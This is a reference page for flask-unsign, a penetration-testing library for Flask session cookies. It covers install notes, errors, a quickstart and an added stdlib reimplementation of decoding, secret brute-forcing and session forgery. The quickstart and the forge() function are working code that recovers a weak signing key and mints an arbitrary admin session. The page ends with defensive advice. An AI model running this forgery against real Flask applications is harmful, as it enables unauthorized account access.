Flask Unsign
version 1.2.1 · verified Sat May 09 · auth: no · language: python
Penetration testing tool to decode, brute-force and re-sign Flask session cookies. The cookie payload is only base64-encoded JSON, so it is readable without the secret; what the secret key protects is the HMAC signature, and flask-unsign recovers the key by testing a wordlist of common secret keys against that signature. Once the key is known, arbitrary session data can be signed and the application will accept it. Current version: 1.2.1. Release cadence is irregular, with the last release in 2022.
pip install flask-unsign (the flask-unsign[wordlist] extra also pulls in the bundled wordlist of common secrets; quote it in zsh)
Common errors
error AttributeError: module 'flask_unsign' has no attribute 'decode' ↓
cause decode() is a top-level function of the installed package (alongside sign(), verify() and the Cracker class), so this error means the name flask_unsign resolved to something else, usually a file or directory called flask_unsign in the working directory shadowing the package.
fix
Check where the import comes from with python -c "import flask_unsign; print(flask_unsign.__file__)", rename the shadowing module, then call flask_unsign.decode(cookie) directly.
error TypeError (missing required positional argument) when calling Cracker.crack() with no wordlist ↓
cause Cracker.crack() needs an iterable of candidate secrets. The CLI can fall back to the bundled list from the flask-unsign[wordlist] extra; the Python API never picks one up implicitly.
fix
Pass any iterable of strings: secret = flask_unsign.Cracker(value=cookie).crack(['secret1', 'secret2'])
Warnings
gotcha Cracker.crack() accepts any iterable of candidate secrets. Passing a file path as a str does not raise: the string is iterated character by character, each character is tried as a secret, and the run simply ends with no match. ↓
fix Read the wordlist into strings first: with open('wordlist.txt') as fh: secret = flask_unsign.Cracker(value=cookie).crack(line.strip() for line in fh)
gotcha The CLI can fetch the session cookie itself (flask-unsign --unsign --server 'https://target/login'), but that request takes no custom headers or proxy settings, and the Python API works on the cookie string only. ↓
fix Fetch the page with requests (with whatever headers, session or proxy the target needs), read the session cookie from the response, and pass its value to flask-unsign.
gotcha The command-line interface (flask-unsign --decode --cookie '...', --unsign, --sign) is the primary documented interface, not a deprecated one; the Python API exposes the same operations for scripting. ↓
fix Use the CLI for one-off checks and import flask_unsign (decode, sign, verify, Cracker) when you need the result inside a script.
Imports
- decode, sign, verify (module-level functions)
- Cracker (brute-force class)
import flask_unsign
Quickstart
import flask_unsign

# Decode the payload without the secret (the signature is not checked)
cookie = 'eyJ1c2VyIjoiYWRtaW4ifQ.XYZ...'
print(flask_unsign.decode(cookie))

# Brute-force the secret key against candidate secrets
wordlist = ['secret', 'key', 'password']
cracker = flask_unsign.Cracker(value=cookie)
secret = cracker.crack(wordlist)   # the matching secret, or None once the list is exhausted
print(f"Secret found: {secret}" if secret else "Not found")

# With the secret you can confirm it and forge a session of your own
if secret:
    print(flask_unsign.verify(cookie, secret=secret))        # True
    print(flask_unsign.sign({'user': 'admin'}, secret=secret))
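What flask-unsign does underneath, as an added example that is not the library's own code: Flask's default session interface hands the session to itsdangerous' URLSafeTimedSerializer with the salt "cookie-session", HMAC-SHA1 and the "hmac" key derivation, so the payload is readable by anyone and only the signature depends on the secret. The block below reimplements decode, sign, verify, the brute-force loop and the resulting forgery in stdlib Python, and also shows the compressed-payload variant (leading "."). The secret CHANGEME, the fixed timestamp, the candidate list and the helper names (tamper, forge) are constructed for the demonstration.

```python
"""Added example, not flask-unsign's own code: the scheme it attacks.

Flask's default session interface hands the session to itsdangerous'
URLSafeTimedSerializer with salt "cookie-session", HMAC-SHA1 and "hmac" key
derivation. Cookie layout, three dot-separated URL-safe base64 parts:
    <payload>.<timestamp>.<HMAC-SHA1(derived_key, "<payload>.<timestamp>")>
A leading "." on the payload part marks a zlib-compressed payload.
"""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Iterable, Optional

SALT = b"cookie-session"  # salt used by flask.sessions.SecureCookieSessionInterface


def _b64encode(raw: bytes) -> bytes:
    """URL-safe base64 with the '=' padding stripped, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64decode(data: bytes) -> bytes:
    """Inverse of _b64encode: restore the padding before decoding."""
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derive_key(secret: str) -> bytes:
    """itsdangerous 'hmac' key derivation: HMAC-SHA1 keyed with the secret, over the salt."""
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()


def decode(cookie: str) -> dict:
    """flask-unsign --decode: read the payload; the signature is never looked at."""
    compressed = cookie.startswith(".")
    first = (cookie[1:] if compressed else cookie).split(".", 1)[0]
    payload = _b64decode(first.encode())
    return json.loads(zlib.decompress(payload) if compressed else payload)


def sign(payload: dict, secret: str, timestamp: Optional[int] = None) -> str:
    """Issue a cookie as Flask does for plain JSON values (a fixed timestamp makes it reproducible)."""
    body = json.dumps(payload, separators=(",", ":"), sort_keys=True).encode()
    encoded = _b64encode(body)
    compressed = zlib.compress(body)
    if len(compressed) < len(body) - 1:  # itsdangerous' compression threshold
        encoded = b"." + _b64encode(compressed)
    ts = int(time.time()) if timestamp is None else timestamp
    signed = encoded + b"." + _b64encode(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    sig = hmac.new(_derive_key(secret), signed, hashlib.sha1).digest()
    return (signed + b"." + _b64encode(sig)).decode()


def verify(cookie: str, secret: str) -> bool:
    """True when the signature was made with this secret (constant-time compare)."""
    signed, _, sig = cookie.encode().rpartition(b".")
    expected = hmac.new(_derive_key(secret), signed, hashlib.sha1).digest()
    try:
        return hmac.compare_digest(_b64decode(sig), expected)
    except ValueError:  # malformed base64 in the signature part
        return False


def crack(cookie: str, candidates: Iterable[str]) -> Optional[str]:
    """flask-unsign --unsign: the first candidate secret that verifies, else None."""
    for candidate in candidates:
        if verify(cookie, candidate):
            return candidate
    return None


def tamper(cookie: str, new_payload: dict) -> str:
    """Swap the payload, keep timestamp and signature: decode() reads it, verify() rejects it."""
    _, ts, sig = cookie.rsplit(".", 2)
    body = json.dumps(new_payload, separators=(",", ":"), sort_keys=True).encode()
    return _b64encode(body).decode() + "." + ts + "." + sig


def forge(cookie: str, new_payload: dict, candidates: Iterable[str]) -> Optional[str]:
    """Full attack: recover the secret from a captured cookie, then mint any session."""
    secret = crack(cookie, candidates)
    return None if secret is None else sign(new_payload, secret)


# Constructed demo data: a weak secret and a cookie issued under it.
DEMO_SECRET = "CHANGEME"
DEMO_WORDLIST = ["password", "secret", "flask", "CHANGEME", "admin"]
DEMO_COOKIE = sign({"user": "guest", "logged_in": False}, DEMO_SECRET, timestamp=1700000000)
```

Two things to take from running it: decode(DEMO_COOKIE) and decode(tamper(DEMO_COOKIE, ...)) both succeed, which is why nothing secret belongs in a Flask session payload, and forge() only works because a candidate in the list verifies, which is why the whole attack collapses against a long random SECRET_KEY. Flask's TaggedJSONSerializer additionally tags datetimes, tuples and bytes; for plain JSON values the output here matches what Flask issues.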